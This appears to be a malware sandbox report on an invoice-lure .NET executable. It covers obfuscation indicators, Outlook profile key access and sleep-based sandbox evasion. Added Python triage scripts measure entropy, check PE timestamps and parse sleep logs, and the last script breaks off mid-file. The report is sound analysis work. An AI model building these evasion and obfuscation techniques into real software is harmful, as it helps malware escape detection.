Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: secur32.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\Factura 1-2501377.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Factura 1-2501377.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Factura 1-2501377.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Factura 1-2501377.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation

Source: Factura 1-2501377.exe, CalendarForm.cs .Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, Mrk6b78ofS1WMbeSnM.cs .Net Code: lZc6wA6gIFJfr2QhCD0 System.Reflection.Assembly.Load(byte[])
Source: Factura 1-2501377.exe Static PE information: 0xD1A76EBF [Tue Jun 17 18:36:47 2081 UTC]
Source: Factura 1-2501377.exe Static PE information: section name: .text entropy: 7.816759184598052
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, c6rbuFHNyCPlrGBq3R.cs High entropy of concatenated method names: 'rALykqSX1c', 'meLyKFFaBL', 'PfIyqIFdth', 'cpoyWH4LGL', 'h3SyZ8O5B8', 'RuOySg8k02', 'KlmyjRHTvJ', 'n45ygul6Yp', 'eBOyCxE8qd', 'mqwyXIU7wa'
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, C4x3ErkRuln6Htq1Kq.cs High entropy of concatenated method names: 'asAJcArsfr', 'cuVJ2fU9nk', 'dZOJahsp5D', 'QZXJ4y7uB6', 'pu7JLynKex', 'GURJFOvV51', 'JHuJAd1qI1', 'F3BJG9fTKi', 'MPRJYCNiUY', 'UGOJiSCwED'
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, eYupwL4gJSmoutEVBs.cs High entropy of concatenated method names: 'LsEMhf3nAd', 'uHIMrF50Ms', 'ToString', 'u2qM6XcToG', 'zfOMJTPEJs', 'byvM5MSPZC', 'QnRMtdqYqc', 'vQoMbNjLBO', 'xbmMpeVJVB', 'u3OM84NaHV'
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, jqwgTuDHipN6pOwxC9.cs High entropy of concatenated method names: 'bWlPp4x3Er', 'FulP8n6Htq', 'QDgPh8gsol', 'KhDPrArMOB', 'MqlP9CIVsv', 'lRSPENhAGL', 'gPuoGBmUFnSWOVYvgw', 'CdIPtaAflAjIr2TXnw', 'MfoPPkkpnS', 'fbYPs1LD0N'
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, tiAGDHKDg8gsoljhDA.cs High entropy of concatenated method names: 'kZL5TPur95', 'yR25f4igjT', 'Vw15koIIX5', 'INH5KFNoiM', 'WEL59KS3Ro', 'mNy5ElH2nf', 'ebL5MJI908', 'MiJ5xGcJ5I', 'kCE5ergsps', 'MDN5vhvE2c'
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, l7C8eWUMNc9FFsXCVX.cs High entropy of concatenated method names: 'inJpBJbiaI', 'f7XpQHdosq', 'MUwpd41iYd', 'Gv5pT2MeH1', 'yoRpumxR7H', 'nrWpfv76mB', 'ujDpldBenY', 'Ug4pk8iUSg', 'g3KpKgsQ6x', 'f5upRB3Krg'
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, iEFCbvFi6nqL55VIYF.cs High entropy of concatenated method names: 'usLMG3JCBu', 'rOtMiZLPML', 'LBCxIqyis4', 'B3yxPa7sFW', 'FJYMXG69At', 'rUPMmvefyq', 'Ii3MHg7ZUQ', 'IEjMc1FOhe', 'c6IM27SNKf', 'BBRMaBhfgD'
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, v6Op69aVJGU8GPg0UT.cs High entropy of concatenated method names: 'ToString', 'efvEXwCgrr', 'BbYEWiRTtd', 'BFoEnZFYRT', 'kBwEZn23mM', 'wxuESMSRbu', 'wYbEOyFsNV', 'DiXEjCrFjc', 'xP3EgD5WNp', 'VKAEUlHcbI'
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, EgKQyecTP8M0OmBv7M.cs High entropy of concatenated method names: 'BJ29CCuueG', 'TL89mVMlkq', 'AOV9csO0fX', 'tnj92PERAm', 'dl39WYaNuB', 'nVn9ngSZFv', 'Pg19Z9SXOx', 'Oar9SqtWa3', 'HwQ9Oy9yyB', 'KGd9jDFHy7'
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, vvrutK18U1b0URP6d8.cs High entropy of concatenated method names: 'dj2diIo2A', 'tygTCN6Ma', 'vtqfK4dWJ', 'p3slBNar6', 'N4pK0E8xD', 'nFuRfOCJq', 'C0yFFBrcb1NywMMJ12', 'K6LqfF0IjUtVnLceyF', 'y8bxLOceV', 'eXtvBF0Vb'
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, RY6bLdPPCZwj1NSuoRG.cs High entropy of concatenated method names: 'ohXviwwDHn', 'qoTvzXOQEv', 'KnB3Ivtjiy', 'vQf3P75vbe', 'MDx315KWXh', 'XL83swwccb', 'vN93De4mp2', 'UQM37vexJ6', 'kqt36ymaQT', 'iRS3JjYxPT'
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, kAijNbzXUCEL3vXSxn.cs High entropy of concatenated method names: 'kbnvfJ2C8H', 'nPHvkbcTmf', 'iA4vKURMfN', 'nu5vqLkChh', 'x0CvWs413l', 'LI9vZgZ4Ql', 'n5tvSW0hZw', 'aTyvVN5Rpw', 'nEjvBRI1U0', 'OchvQh0sal'
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, rXyvFNiV2f2oCJOOO0.cs High entropy of concatenated method names: 'PWLv5ttrRw', 'NENvt46cD8', 'ckZvbkyqrX', 'Nkrvp83xBX', 'lrfverXARA', 'HPZv87Dqf4', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, xsvhRSqNhAGLsl0Buw.cs High entropy of concatenated method names: 'J9Hb7kcDhk', 'GFnbJe3yAU', 'DM9btoQF6p', 'kcJbpSUuAl', 'kNlb8GpY4V', 'nMBtL9rYe7', 'ML6tF2iCwr', 'ou6tAtTpVn', 'zCgtGWfd18', 'vLVtYEBp1E'
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, chxL3BJejmNsKOe7cT.cs High entropy of concatenated method names: 'Dispose', 'eMEPYRarde', 'efS1WXlBWq', 'SRlaIVZVGV', 'o8WPiZfafl', 'cFEPz9Kp3p', 'ProcessDialogKey', 'kAT1IGTHlZ', 'sl11PwSCxm', 'meM11eXyvF'
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, jAkcIWAygDMERarde9.cs High entropy of concatenated method names: 'tuve9aqVeA', 'HC0eMf3q6D', 'XnyeeKwC0O', 'jOIe3SncyT', 'txHeNS9AqU', 'S0LeV6TjUc', 'Dispose', 'gkEx6oN5mw', 'r61xJMkoUg', 'QS9x548aen'
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, jU4uOl5Ch63WyhBPoT.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'dXN1YB5Bef', 'L0P1iCX3qO', 'HDw1zL5dHb', 'NyisI1jUXX', 'gEcsPptV3c', 'W2us1A9UFI', 'd6Wssq37DB', 'd4C44K6aqQHrEVmpj96'
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, Mrk6b78ofS1WMbeSnM.cs High entropy of concatenated method names: 'sVFs7l2o3U', 'tRDs6xBd5A', 'i1hsJZ7Qfa', 'ns6s5iTmEN', 'Ky7stbb1sB', 'wYWsbu2dPM', 'RkDspYFidw', 'WJws86lk2b', 'nfPs07s7Ly', 'eRssh1DU0c'
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, nMOBFbRtWSlxpgqlCI.cs High entropy of concatenated method names: 'aqetuoCh6y', 'uPRtlJQY97', 'iMr5nARKIZ', 'sDU5ZCd5Mt', 'lXx5SwEeMk', 'krl5OSyEnh', 'Ue15jbexEj', 'y1S5gViIZX', 'TdL5UdSENw', 'pNL5CyBRxj'
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, AGTHlZYvl1wSCxmheM.cs High entropy of concatenated method names: 'OaPeqwCZRK', 'XvheWEw5KU', 'XjLenP9KcW', 'TYneZwGnuG', 'caneSLilPl', 'i3UeOS78kY', 'lQYejOnv09', 'YqBegfbaaH', 'ER9eUUcBBl', 'mm7eClw8iI'
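The Data Obfuscation block rests on three static measurements: entropy of the .text section (7.82 bits per byte, close to the 8.0 ceiling), entropy of the concatenated method names, and a TimeDateStamp of 0xD1A76EBF that decodes to a date in 2081. The following is an added example, not the sandbox's own implementation, that reproduces those measurements in Python. The packed-section threshold, the comparison list of ordinary .NET method names and the minimal PE stub used to exercise the header parser are assumptions; the obfuscated names (from c6rbuFHNyCPlrGBq3R.cs) and the timestamp are copied from the report.

```python
"""
Static triage heuristics behind the Data Obfuscation findings, done by hand:
Shannon entropy of a section body, entropy of concatenated method names, and
a sanity check on IMAGE_FILE_HEADER.TimeDateStamp.
"""
import math
import struct
from collections import Counter
from datetime import datetime, timezone
from typing import Iterable, Union

# From the report: method names of c6rbuFHNyCPlrGBq3R.cs and the raw
# TimeDateStamp of the submitted file.
OBFUSCATED_NAMES = ['rALykqSX1c', 'meLyKFFaBL', 'PfIyqIFdth', 'cpoyWH4LGL',
                    'h3SyZ8O5B8', 'RuOySg8k02', 'KlmyjRHTvJ', 'n45ygul6Yp',
                    'eBOyCxE8qd', 'mqwyXIU7wa']
REPORT_TIMESTAMP = 0xD1A76EBF

# Constructed comparison set of ordinary .NET method names (assumption).
PLAIN_NAMES = ['ToString', 'Dispose', 'GetHashCode', 'Equals',
               'InitializeComponent', 'Main', 'ProcessDialogKey',
               'EditValue', 'GetEditStyle', 'Next', 'NextBytes']

# Bits per byte above which a code section is treated as packed/encrypted.
# Assumption for the example; plain x86/CIL code usually sits around 6.
PACKED_SECTION_THRESHOLD = 7.2


def shannon_entropy(data: Union[bytes, str]) -> float:
    """Bits per symbol over the empirical symbol distribution (8.0 max for bytes)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def section_looks_packed(section_body: bytes) -> bool:
    return shannon_entropy(section_body) >= PACKED_SECTION_THRESHOLD


def method_name_entropy(names: Iterable[str]) -> float:
    """Entropy of all method names concatenated into one string, as the report measures it."""
    return shannon_entropy("".join(names))


def pe_timestamp(ts: int) -> datetime:
    """TimeDateStamp is seconds since the Unix epoch, UTC."""
    return datetime.fromtimestamp(ts, tz=timezone.utc)


def timestamp_is_suspicious(ts: int, now: datetime) -> bool:
    """Zero, or later than the time of analysis: cannot be a real build time."""
    return ts == 0 or pe_timestamp(ts) > now


def read_timestamp_from_pe(pe_bytes: bytes) -> int:
    """e_lfanew at 0x3C -> 'PE\\0\\0' -> COFF header; TimeDateStamp is its third field."""
    e_lfanew = struct.unpack_from("<I", pe_bytes, 0x3C)[0]
    if pe_bytes[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    # COFF header: Machine(2) NumberOfSections(2) TimeDateStamp(4) ...
    return struct.unpack_from("<I", pe_bytes, e_lfanew + 8)[0]


def _constructed_pe_stub(ts: int) -> bytes:
    """Minimal DOS header + PE signature + COFF header built for the example (constructed)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)          # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x014C, 3, ts, 0, 0, 0xE0, 0x0102)
    return bytes(dos) + b"PE\0\0" + coff


if __name__ == "__main__":
    now = datetime.now(timezone.utc)
    print("method-name entropy (report):", round(method_name_entropy(OBFUSCATED_NAMES), 2))
    print("method-name entropy (plain) :", round(method_name_entropy(PLAIN_NAMES), 2))
    ts = read_timestamp_from_pe(_constructed_pe_stub(REPORT_TIMESTAMP))
    print("TimeDateStamp:", pe_timestamp(ts).isoformat(),
          "suspicious" if timestamp_is_suspicious(ts, now) else "plausible")
```

To run it on a real file, read it with open(path, 'rb') and pass the bytes to read_timestamp_from_pe; for the section entropy, slice the section body with the PointerToRawData and SizeOfRawData fields of the matching section header. A forward-dated stamp is not proof of tampering by itself: deterministic builds (Roslyn /deterministic, MSVC /Brepro) deliberately store a hash of the output in that field, so treat it as one corroborating indicator next to the section entropy and the in-memory Assembly.Load(byte[]) calls listed above.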
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information set: NOOPENFILEERRORBOX Jump to behavior (101 identical entries collapsed into this one line; each corresponds to a SetErrorMode call carrying SEM_NOOPENFILEERRORBOX)

Malware Analysis System Evasion

barindex
Source: Yara match File source: Process Memory Space: Factura 1-2501377.exe PID: 6324, type: MEMORYSTR
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Memory allocated: 15B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Memory allocated: 2ED0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Memory allocated: 4ED0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Memory allocated: 9160000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Memory allocated: 7B40000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Memory allocated: A160000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Memory allocated: B160000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Memory allocated: 15C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Memory allocated: 3020000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Memory allocated: 2DD0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 599874 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 599765 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 599546 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 599437 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 599328 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 599218 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 599109 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 598999 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 598890 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 598781 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 598671 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 598562 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 598453 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 598343 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 598234 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 598124 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 598015 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 597906 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 597796 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 597687 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 597578 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 597468 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 597359 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 597249 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 597140 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 597020 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 596890 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 596781 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 596671 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 596562 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 596452 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 596343 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 596234 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 596124 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 596015 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 595905 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 595796 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 595682 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 595562 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 595453 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 595343 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 595209 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 595078 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 594927 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 594796 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 594687 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 594578 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Thread delayed: delay time: 594468 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Window / User API: threadDelayed 8289 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Window / User API: threadDelayed 1565 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 6436 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep count: 32 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -29514790517935264s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -599874s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3644 Thread sleep count: 8289 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3644 Thread sleep count: 1565 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -599765s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -599656s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -599546s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -599437s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -599328s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -599218s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -599109s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -598999s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -598890s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -598781s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -598671s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -598562s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -598453s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -598343s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -598234s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -598124s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -598015s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -597906s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -597796s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -597687s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -597578s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -597468s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -597359s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -597249s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -597140s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -597020s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -596890s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -596781s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -596671s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -596562s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -596452s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -596343s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -596234s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -596124s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -596015s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -595905s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -595796s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -595682s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -595562s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -595453s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -595343s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -595209s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -595078s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -594927s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -594796s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -594687s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -594578s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe TID: 3452 Thread sleep time: -594468s >= -30000s Jump to behavior
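Two of the evasion entries above need a caveat before they count toward a verdict. The "memory reserve | memory write watch" allocations are how the .NET garbage collector reserves its heap segments (VirtualAlloc with MEM_WRITE_WATCH), so every managed process trips that signature, and the decompiled .cs classes listed in this report mark the sample as .NET. The sleep arguments, by contrast, are telling: 600000, 599874, 599765 ... 594468 is a countdown in roughly 110 ms steps, the trace of a loop that recomputes the remaining time on every pass and is therefore not shortened by sandbox sleep-skipping, while 922337203685477 is an infinite wait. The script below is an added example, not code from the report or from Joe Sandbox's tooling: it parses lines of the shapes shown above (a short excerpt copied from this report is embedded as the sample input) and turns them into those findings. The regular expressions, the thresholds and the reading of 922337203685477 as an infinite wait are assumptions.

```python
"""Triage helper for the sleep / write-watch evidence in a Joe Sandbox evasion block.
Added example for this page, not code from the report or from Joe Sandbox.
SAMPLE_LINES is a short excerpt copied from the report; the regexes, the thresholds
and the reading of 922337203685477 as an infinite wait are assumptions."""
import re
from collections import defaultdict

# Joe Sandbox prints Sleep() arguments in milliseconds.  922337203685477 is
# Int64.MaxValue in 100-ns units divided by 10 000, i.e. an infinite wait (assumed).
INFINITE_MS = 922_337_203_685_477
LONG_SLEEP_MS = 3 * 60 * 1000     # assumed threshold for a "long" sleep
MAX_STEP_MS = 1_000               # assumed max per-iteration drift of a stalling loop
MIN_COUNTDOWN = 10                # assumed minimum run length before calling it a loop

DELAY_RE = re.compile(r"Thread delayed: delay time: (\d+)")
TID_RE = re.compile(r"TID: (\d+) Thread sleep (?:time: -(\d+)s|count: (\d+))")
WRITE_WATCH_RE = re.compile(
    r"Memory allocated: ([0-9A-Fa-f]+) memory reserve \| memory write watch")

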